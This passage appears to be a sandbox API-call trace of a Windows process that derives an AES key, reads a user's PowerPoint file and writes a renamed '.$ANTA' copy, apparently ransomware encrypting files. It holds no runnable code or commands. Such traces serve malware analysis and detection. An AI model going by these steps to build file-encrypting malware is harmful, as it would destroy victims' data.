(in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0075.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0075.617] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac780) returned 1 [0075.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0075.618] CryptDestroyHash (hHash=0x41ac440) returned 1 [0075.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ago5jvfwme.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0075.619] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.619] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.619] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0075.619] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0075.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0075.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0075.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.622] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0075.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0075.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0075.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0075.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0075.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\ago5jvfwme.pptx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.623] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0075.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0075.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0075.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0075.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0075.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0075.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0075.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0075.628] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0075.629] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0075.632] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x1972, lpOverlapped=0x0) returned 1 [0075.632] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0075.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11972) returned 0x440b3b8 [0075.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0075.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11972) returned 0x441cd38 [0075.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.636] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11972) returned 0x440b3b8 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.637] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0075.637] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0075.637] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0075.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11972) returned 0x440b3b8 [0075.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0075.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0075.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11972) returned 0x442e6b8 [0075.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0075.640] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0075.640] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0075.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0075.641] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0075.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0075.641] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0075.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0075.642] 